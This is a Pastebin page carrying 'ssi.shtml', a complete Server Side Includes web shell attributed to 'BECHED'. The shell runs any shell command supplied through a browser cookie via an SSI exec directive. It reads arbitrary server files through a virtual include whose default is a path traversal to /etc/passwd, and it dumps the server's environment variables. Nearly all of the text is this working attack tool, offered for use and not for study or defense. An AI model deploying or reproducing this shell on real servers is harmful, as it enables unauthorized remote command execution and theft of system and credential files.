API tools faq
paste
Advertisement
parkdream1

ssi.shtml

parkdream1
Oct 7th, 2013
733
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 4.30 KB | None | 0 0
raw download clone embed print report
  1. <!--#config errmsg="[Error in shell]"-->
  2. <!--#config sizefmt="bytes"-->
  3.  
  4. <!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"GET\")" -->
  5.     <!--#set var="shl" value="ls -al" -->
  6. <!--#else -->
  7.     <!--#set var="shl" value=$HTTP_COOKIE -->
  8. <!--#endif -->
  9.  
  10. <!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"POST\")" -->
  11.     <!--#set var="inc" value="/../../../../../../../etc/passwd" -->
  12. <!--#else -->
  13.     <!--#set var="inc" value=$HTTP_COOKIE -->
  14. <!--#endif -->
  15.  
  16. <html>
  17. <head>
  18. <title>
  19. SSI Web Shell by BECHED
  20. </title>
  21. <script language="javascript">
  22. function doit( mode ) {
  23.     if( document.cookie != "" ) {
  24.         var cookies = document.cookie.split( ";" );
  25.         for( var i = 0; i < cookies.length; ++i )  
  26.            document.cookie = cookies[ i ] + ";expires=Thu, 01 Jan 1970 00:00:00 GMT";
  27.    }
  28.    document.cookie = document.getElementById( mode ).value;
  29.    document.location.reload();
  30. }
  31. function toggle( id ) {
  32.    document.getElementById( id ).style.display = (document.getElementById( id ).style.display == "none") ? "block" : "none";
  33. }
  34. </script>
  35. </head>
  36. <body bgcolor=#e4e0d8 alink=blue vlink=blue>
  37. <div align=center width=100% border=0 style=background-color:#D4D0C8;>
  38. <center><b><font size=+2><a href=http://ahack.ru/releases/ssi-web-shell.htm>SSI Web Shell</a></font></b></center>
  39. </div><br>
  40. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
  41. <center><b><u><font size=+1 onclick=toggle('inf'); style=cursor:hand;>Common info</font></u></b></center>
  42. <div id=inf style=display:none;><br>
  43. <b><font color=blue>GMT date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_GMT --></b><br>
  44. <b><font color=blue>Local date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_LOCAL --></b><br>
  45. <b><font color=blue>Document name</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_NAME --></b><br>
  46. <b><font color=blue>Document URI</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_URI --></b><br>
  47. <b><font color=blue>Last modified</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=LAST_MODIFIED --></b><br>
  48. <b><font color=blue>Owner</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=USER_NAME --></b><br>
  49. <br></div>
  50. </div>
  51. <br>
  52. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
  53. <center><b><u><font size=+1 onclick=toggle('env'); style=cursor:hand;>Enviroment info</font></u></b></center>
  54. <div id=env style=display:none;><br>
  55. <pre>
  56. <!--#printenv-->
  57. </pre>
  58. <br></div>
  59. </div>
  60. <br>
  61. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
  62. <center><b><u><font size=+1 onclick=toggle('shl'); style=cursor:hand;>Command for shell</font></u></b></center></div>
  63. <div align=left width=100% border=0 id=shl style=background-color:#D4D0C8;<!--#if expr="\"$REQUEST_METHOD\" != \"GET\"" -->display:none;<!--#endif -->>
  64. <br><b><font color=blue>Enter command</font></b>:&nbsp;&nbsp;&nbsp;<form method=get onsubmit=doit('command');><input type=text size=80 id=command>&nbsp;<input type=submit value=Run></form><br>
  65. <center><b><font size=+1>Result</font></b></center>
  66. <br>
  67. <b><font color=blue>Executed command</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=shl --></b><br>
  68. <textarea bgcolor=#e4e0d8 cols=121 rows=15>
  69. <!--#exec cmd=$shl -->
  70. </textarea>
  71. </div>
  72. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
  73. <center><b><u><font size=+1 onclick=toggle('inc'); style=cursor:hand;>Operations on files</font></u></b></center>
  74. <div id=inc <!--#if expr="\"$REQUEST_METHOD\" != \"POST\"" -->style=display:none;<!--#endif -->><br>
  75. <b><font color=blue>View file (virtual include)</font></b>:&nbsp;&nbsp;&nbsp;<form method=post onsubmit=doit('vfile');><input type=text size=80 id=vfile>&nbsp;<input type=submit value=Run></form><br>
  76. <b><font color=blue>Included file</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=inc --></b><br>
  77. <b><font color=blue>Size</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#fsize virtual=$inc -->&nbsp;bytes</b><br>
  78. <textarea bgcolor=#e4e0d8 cols=121 rows=15>
  79. <!--#include virtual=$inc -->
  80. </textarea>
  81. <br></div>
  82. </div>
  83. <br>
  84. <div align=center width=100% border=0 style=background-color:#D4D0C8;>
  85. <center><b><font size=+1><a href=ehcommunity.com>(c) BECHED</a></font></b><br><small>2009-2011, v1.2</small></center>
  86. </div>
  87. </body>
  88. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!